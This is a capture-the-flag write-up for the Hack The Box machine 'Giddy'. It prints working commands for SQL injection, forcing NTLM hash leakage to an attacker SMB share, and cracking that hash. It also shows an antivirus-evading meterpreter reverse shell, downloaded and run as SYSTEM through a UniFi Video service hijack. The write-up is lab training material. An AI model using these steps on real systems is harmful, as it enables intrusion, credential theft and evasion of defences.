Giddy

16/02/2019

This is a very interesting box which requires a SMBRelay attack through a MSSQL connection to obtain a user shell and to escalate privileges we will need to do some AV bypassing to make our exploit work.

User Privilege Escalation

User

First run a nmap to list versions and execute default scripts to see ports 80, 443 and 3389 are opened.

root@kali:~/htb/giddy# nmap -sC -sV 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-04 10:08 UTC
Nmap scan report for 10.10.10.104
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_ssl-date: 2019-02-04T10:08:33+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-03T04:29:07
|_Not valid after:  2019-08-05T04:29:07
|_ssl-date: 2019-02-04T10:08:33+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.44 seconds

In the default page of the IIS server we have the following picture on both http and https.

We are going to run gobuster with SecLists' raft-small-directories.txt wordlist to try to find something in the web server.

root@kali:~/htb/giddy# /opt/gobuster/gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt -u http://10.10.10.104/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.104/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/02/05 09:25:55 Starting gobuster
=====================================================
/aspnet_client (Status: 301)
/remote (Status: 302)
/Aspnet_client (Status: 301)
/mvc (Status: 301)
/aspnet_Client (Status: 301)
/Remote (Status: 302)
=====================================================
2019/02/05 09:29:20 Finished
=====================================================

We have a PowerShell login panel on /remote.

And some kind of inventory in /mvc.

When clicking on any of those items we get redirected to a more detailed view of the product.

The URL has the following structure: http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18. If we change that ID and add special characters like 18' we get the following SQL error.

This might mean we can exploit a SQLi in that parameter, so let's use sqlmap to find it out.

root@kali:~/htb/giddy# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
...
sqlmap identified the following injection point(s) with a total of 76 HTTP(s) requests:
---
Parameter: ProductSubCategoryId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductSubCategoryId=18 AND 8664=8664

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ProductSubCategoryId=18 AND 4450 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4450=4450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(120)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ProductSubCategoryId=(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7751=7751) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(120)+CHAR(113))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ProductSubCategoryId=18;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: ProductSubCategoryId=18 WAITFOR DELAY '0:0:5'
---
[09:41:09] [INFO] testing Microsoft SQL Server
[09:41:09] [INFO] confirming Microsoft SQL Server
[09:41:10] [INFO] the back-end DBMS is Microsoft SQL Server
...

The page is vulnerable and is running a MSSQL as DBMS.

We can dump the database information, but this takes a really long time and I didn't found anything interesting, because those credit card numbers are fake unfortunately.

root@kali:~/htb/giddy# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18 --dump
...
+--------------+---------+----------+---------------+----------------+------------------------+
| CreditCardID | ExpYear | ExpMonth | CardType      | CardNumber     | ModifiedDate           |
+--------------+---------+----------+---------------+----------------+------------------------+
| 11935        | 2006    | 11       | SuperiorCard  | 11111000471254 | Aug 30 2007 12:00AM    |
| 12094        | 2005    | 8        | Distinguish   | 11111002034157 | Jan \xa06 2008 12:00AM |
| 10246        | 2005    | 7        | ColonialVoice | 11111005230447 | Feb 15 2008 12:00AM    |
| 3009         | 2006    | 7        | ColonialVoice | 11111007955171 | Jun 21 2007 12:00AM    |
...

Now that we have control of the database, what we're going to do is make the Giddy machine connect to us through SMB to get the NTLM hash of the user.

First of all, start smbserver module from impacket to set up a SMB share in our machine.

root@kali:~/htb/giddy# /opt/impacket/examples/smbserver.py caca /pipi
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Then use sqlmap again to start a sql-shell in Giddy.

root@kali:~/htb/giddy# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18 --sql-shell
...
sql-shell> 

Once inside, we can run the following command to initiate a connection to the SMB share we have just created in our machine.

sql-shell> EXEC master..xp_dirtree '\\10.10.16.35\caca'

If we check the smbshare output we can see the NTLM hash of the user GIDDY\Stacy.

[*] Incoming connection (10.10.10.104,49781)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User Stacy\GIDDY authenticated successfully
[*] Stacy::GIDDY:4141414141414141:4edf58c83b130168f90c5b9326c31244:010100000000000000babd486fbdd40101fc3192d02de35000000000010010006f0071006e00580068006c0066006300020010004800520057005100430070006c005700030010006f0071006e00580068006c0066006300040010004800520057005100430070006c0057000700080000babd486fbdd401060004000200000008003000300000000000000000000000003000002ec7b345bd46499b56b5c2fc37f09f668bc815d35dd07b3f192688f111c10a0a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003500000000000000000000000000
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User Stacy\GIDDY authenticated successfully
[*] Stacy::GIDDY:4141414141414141:265ce91e9fc10b1288af1330b4dfa784:010100000000000000babd486fbdd40114ba6b9df9d51e1800000000010010006f0071006e00580068006c0066006300020010004800520057005100430070006c005700030010006f0071006e00580068006c0066006300040010004800520057005100430070006c0057000700080000babd486fbdd401060004000200000008003000300000000000000000000000003000002ec7b345bd46499b56b5c2fc37f09f668bc815d35dd07b3f192688f111c10a0a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003500000000000000000000000000

We can use hashcat to crack the obtained hash and get the real password xNnWo6272k7x.

root@kali:~/htb/giddy# hashcat -m 5600 ntlm /usr/share/wordlists/rockyou.txt --force
...
STACY::GIDDY:4141414141414141:8fb6db9998908fed4f1de19c791dd4ae:010100000000000080e1c72540bdd4013ed303d26c5b0876000000000100100076005a006500680071006f0072005700020010004c007500440063004c005700740044000300100076005a006500680071006f0072005700040010004c007500440063004c005700740044000700080080e1c72540bdd4010600040002000000080030003000000000000000000000000030000017ff5a3fd3da3c7bdf30a3e6cc9bd6afc10bcacf578d4f1debf2d2cf690905850a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003500000000000000000000000000:xNnWo6272k7x

With those credentials, now we can connect to the login panel we saw before on https://10.10.10.104/remote/.

Inside, we have a PowerShell shell we can use to execute commands.

Under Stacy's Desktop we have the user flag.

PS C:\Users\Stacy\Desktop> type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

After some enumeration we can see what could be an interesting program installed in the machine, UniFi Video.

PS C:\Users\Stacy\Documents> dir 

    Directory: C:\Users\Stacy\Documents

Mode                LastWriteTime         Length Name                                                                  

----                -------------         ------ ----                                                                  

-a----        6/17/2018   9:36 AM              6 unifivideo                                                            

And of course, there are some exploits for that program.

root@kali:~/htb/giddy# searchsploit unifi video
------------------------------------------------ ----------------------------------------
 Exploit Title                                  |  Path
                                                | (/usr/share/exploitdb/)
------------------------------------------------ ----------------------------------------
Ubiquiti Networks UniFi Video Default - 'crossd | exploits/php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Privilege Es | exploits/windows/local/43390.txt
------------------------------------------------ ----------------------------------------
Shellcodes: No Result

We're going to try to use Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation exploit to escalate privileges.

As the txt explains, this vulnerability consists in that upon start and stop of the service, it tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe and by copying an arbitrary exe there, it is possible to execute it as NT AUTHORITY/SYSTEM.

What we're going to do is create a malicious exe which will create reverse shell to our local machine. To start, check the system architecture.

PS C:\ProgramData\unifi-video> $ENV:PROCESSOR_ARCHITECTURE
AMD64

The problem here is that the anti virus blocks and removes our executables, so we will have to bypass it.

PS C:\ProgramData\unifi-video> Get-FileHash taskkill.exe
Get-FileHash : The file 'C:\ProgramData\unifi-video\taskkill.exe' cannot be read: Operation did not complete 
successfully because the file contains a virus or potentially unwanted software.

    + CategoryInfo          : ReadError: (C:\ProgramData\unifi-video\taskkill.exe:PSObject) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : FileReadError,Get-FileHash

To accomplish the bypass I used Phantom-Evasion to create a meterpreter stager using all the default options, which create multiple processes, strip and sign the executable to difficult the detection.

[1] Windows modules -> [2] Stager -> [2] X64 stagers -> [1] C x64/meterpreter/reverse_TCP VirtualAlloc 

====

[>] Please insert LHOST: 10.10.16.35

[>] Please insert LPORT: 6969

[>] Please insert output filename: taskkill

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): y

[>] Insert number of decoy processes (integer between 1-3): 2

[>] Generating C meterpreter stager


[>] Compiling...


[>] Strip 

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)


[>] Strip executable? (y/n):y

[>] Stripping...


[>] Sign Executable 

Online Certificate spoofer & Executabe signer (Lower rate of detection)


[>] Sign executable? (y/n):y

[>] Insert certificate spoofing target (default: www.microsoft.com:443): 

[>] Insert sign software description (default: Notepad Benchmark Util): 

[>] Signing taskkill.exe with osslsigncode...

[>] Succeeded


[<>] File saved in Phantom-Evasion folder

To listen for the meterpreter session use msfconsole exploit/multi/handler module with windows/x64/meterpreter/reverse_tcp as payload, specifying our IP and the port selected before.

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.35      yes       The listen address (an interface may be specified)
   LPORT     6969             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.35:6969 

Now as the description of the exploit says, we have to put our exe on C:\ProgramData\unifi-video\taskkil.exe.

PS C:\Users\Stacy\Documents> cd C:\ProgramData\unifi-video
PS C:\ProgramData\unifi-video> wget http://10.10.16.35/taskkill.exe -UseBasicParsing -OutFile taskkill.exe

Restart the service and the exe should be automatically executed.

PS C:\ProgramData\unifi-video> Restart-Service -Name "Ubiquiti UniFi Video"

On msfconsole we should see a meterpreter session from Giddy has been opened as nt authority\system.

[*] Sending stage (206403 bytes) to 10.10.10.104
[*] Meterpreter session 4 opened (10.10.16.35:6969 -> 10.10.10.104:49909) at 2019-02-05 15:46:11 +0000

meterpreter > shell
Process 1708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
whoami
nt authority\system

Root flag is on the Administrator's desktop.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX